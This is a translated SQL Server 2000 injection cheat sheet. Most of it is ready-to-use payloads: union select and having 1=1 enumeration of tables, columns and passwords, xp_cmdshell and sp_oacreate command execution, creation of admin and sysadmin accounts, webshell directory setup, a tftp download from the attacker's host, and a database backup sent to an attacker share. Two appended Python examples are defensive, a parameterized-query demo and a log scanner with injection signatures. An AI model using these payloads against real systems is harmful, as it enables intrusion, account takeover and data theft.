SQL Server 2000 Injection and Protection Compendium (Part 1)
SQL injection started with or 1=1.
The most important table names:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
The most important user names (present by default in a SQL Server database):
public
dbo
guest (usually disabled, or has no permissions)
db_securityadmin
db_ddladmin
Some default extended stored procedures:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia: drive related
xp_dirtree: directory tree
xp_enumdsn: ODBC connections
xp_loginconfig: server security mode information
xp_makecab: create a compressed archive
xp_ntsec_enumdomains: domain information
xp_terminate_process: terminate a process, given a PID
For example:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -S localhost -U sa -P foobar
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values(666, 'attacker', 'foobar', 0xffff)--
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'--
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' and COLUMN_NAME NOT IN ('login_id')--
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' and COLUMN_NAME NOT IN ('login_id','login_name')--
union select TOP 1 login_name FROM logintable--
union select TOP 1 password FROM logintable where login_name='Rahul'--
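Every line above, from the original or 1=1 to the INFORMATION_SCHEMA enumeration, works for one reason: the request value is spliced into the SQL text, so a quote closes the literal and a comment marker discards the rest. The following is an added example, not code from the original post, that puts the vulnerable concatenation next to its parameterized form. It uses Python's sqlite3 as an offline stand-in for SQL Server 2000; the users table and its single admin row are constructed sample data, and the quote-and-comment mechanics are the same in T-SQL.

```python
"""Added example (not from the original post): concatenated vs. parameterized
login query. sqlite3 stands in for SQL Server 2000 so it runs offline; the
mechanics of ' or 1=1-- (close the string literal, make the WHERE always true,
comment out the rest) are the same in T-SQL."""
import sqlite3


def make_db():
    # Constructed sample data shaped like the post's users/logintable.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table users(id integer, username text, password text, privs integer)"
    )
    conn.execute("insert into users values (1, 'admin', 's3cret', 65535)")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # The defect behind every payload in the post: input spliced into SQL text.
    sql = (
        "select username from users where username='" + username
        + "' and password='" + password + "'"
    )
    return conn.execute(sql).fetchone()


def login_parameterized(conn, username, password):
    # Placeholders pass the input as data, so the quote and the comment
    # marker are compared as characters and never change the statement.
    sql = "select username from users where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone()


def demo():
    conn = make_db()
    probe = "' or 1=1--"
    return {
        "vulnerable": login_vulnerable(conn, probe, "x"),      # returns the admin row
        "parameterized": login_parameterized(conn, probe, "x"),  # returns None
        "legit": login_parameterized(conn, "admin", "s3cret"),   # normal login still works
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(name, "->", row)
```

Run it and compare the three results: the concatenated query returns the admin row for a probe that knows no password, the parameterized one returns nothing for the same probe, and a real login still succeeds. Parameter binding (ADO command parameters in the ASP of that era) is the fix; filtering single quotes is not, because several payloads further down need no quote at all.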
Crafted statements: check whether xp_cmdshell exists
union select @@version,1,1,1--
and 1=(select @@VERSION)
and 'sa'=(select System_user)
union select ret,1,1,1 from foo--
union select min(username),1,1,1 from users where username>'a'--
union select min(username),1,1,1 from users where username>'admin'--
union select password,1,1,1 from users where username='admin'--
and user_name()='dbo'
and 0<>(select user_name())--
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user swap 5245886 /add'
and 1=(select count(*) FROM master.dbo.sysobjects where xtype='X' AND name='xp_cmdshell')
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin')) determines whether the connection has sa (sysadmin) privileges
and 0<>(select top 1 paths from newtable)-- the database-dump technique
and 1=(select name from master.dbo.sysdatabases where dbid=7) gets a database name (dbid 1 to 5 are the system databases; only 6 and above need checking)
Create a virtual directory for drive E:
declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:"'
Set the access permissions (used together with writing a webshell):
declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7,8,9,... in turn to get more database names
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') reveals a table; assume it is admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) to get the other tables.
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) reveals the uid value; assume it is 18779569 (uid=id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) gets one field of admin; assume it is user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...)) to reveal the other fields
and 0<(select user_id from BBS.dbo.admin where username>1)
This gets the username, and in the same way the password... assuming fields such as user_id, username and password exist
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union statements are popular everywhere; they work on Access too)
Special database-dump trick: %5c, i.e. replace the / with %5c and submit
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') gets the table name
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) determines the id value
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) all fields
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap]([swappass][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots',@value_name='/',values=@test OUTPUT insert into paths(path) values(@test)
http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
This yields the web path d:\xxxx; next:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
The traditional test procedure when xp_cmdshell exists:
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax,sysadmin;--
;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
http://www.xxx.com/list.asp?classid=1;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators swap /add'
http://localhost/show.asp?id=1;exec master..xp_cmdshell 'tftp -i youip get file.exe'--
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a sysname; set @a=db_name(); backup database @a to disk='\\你的IP\你的共享目录\bak.dat'
If restricted, the following can be used:
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')
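For the protection side of the title, here is an added example (not from the original post) that scans IIS-style web log lines for the signatures used throughout this list: the system tables, the xp_ and sp_oa procedures, union select, having 1=1, and the 'xp_'+'cmdshell' string-splitting trick shown a few lines up. The log lines are constructed samples, the field layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is an assumed W3C-style order, and the signature list contains only what this post shows, so it is a starting point for a filter or an alert rule rather than a complete one.

```python
"""Added example (not from the original post): flag web requests that carry the
SQL Server injection signatures listed in this post. The log lines below are
constructed, and the field order is an assumed W3C/IIS-style layout."""
import re
from urllib.parse import unquote_plus

# Tokens taken from the payloads in the post, compared after normalisation.
SIGNATURES = [
    "sysobjects", "syscolumns", "sysdatabases", "sysxlogins",
    "information_schema", "xp_cmdshell", "sp_oacreate", "sp_oamethod",
    "sp_addextendedproc", "sp_addsrvrolemember", "xp_regread", "xp_dirtree",
    "openrowset", "union select", "having 1=1", "@@version",
    "is_srvrolemember", "backup database",
]


def normalise(query):
    """Undo the encoding and string splitting the post relies on before matching."""
    text = unquote_plus(query).lower()          # %20 -> space, + -> space
    # 'xp_'+'cmdshell' and 'xp'+'_cm'+'dshell' become one token again.
    text = re.sub(r"'\s*\+\s*'", "", text)
    return re.sub(r"\s+", " ", text)


def scan_query(query):
    """Return the signatures present in one URL query string, in SIGNATURES order."""
    text = normalise(query)
    return [sig for sig in SIGNATURES if sig in text]


def scan_log(lines):
    """Return (line number, client IP, uri-stem, signatures) for suspicious
    requests. Assumed field order: date time c-ip cs-method cs-uri-stem
    cs-uri-query sc-status; header lines start with '#'."""
    hits = []
    for number, line in enumerate(lines, 1):
        if line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        found = scan_query(parts[5])
        if found:
            hits.append((number, parts[2], parts[4], found))
    return hits


# Constructed sample log: two ordinary requests and three modelled on the post.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2005-03-01 10:00:01 192.0.2.10 GET /show.asp id=12 200",
    "2005-03-01 10:00:05 192.0.2.77 GET /show.asp "
    "id=-1%20union%20select%201,2,3,*%20from%20admin 500",
    "2005-03-01 10:00:09 192.0.2.77 GET /list.asp "
    "classid=1;declare%20@a%20sysname%20set%20@a='xp_'%2B'cmdshell'%20exec%20@a 500",
    "2005-03-01 10:00:12 192.0.2.77 GET /111.asp "
    "id=3400;exec%20master..sp_addextendedproc%20xp_cmdshell,xplog70.dll 500",
    "2005-03-01 10:00:20 192.0.2.10 GET /show.asp id=13 200",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The decode-then-unsplit order matters: the post's 'xp_'+'cmdshell' variant defeats a plain substring match on the raw query, and URL encoding defeats a match on the raw log line, so both are undone before comparing. A real deployment would also decode the POST body and look at cs-uri-stem, since the same payloads arrive in form fields as readily as in the query string.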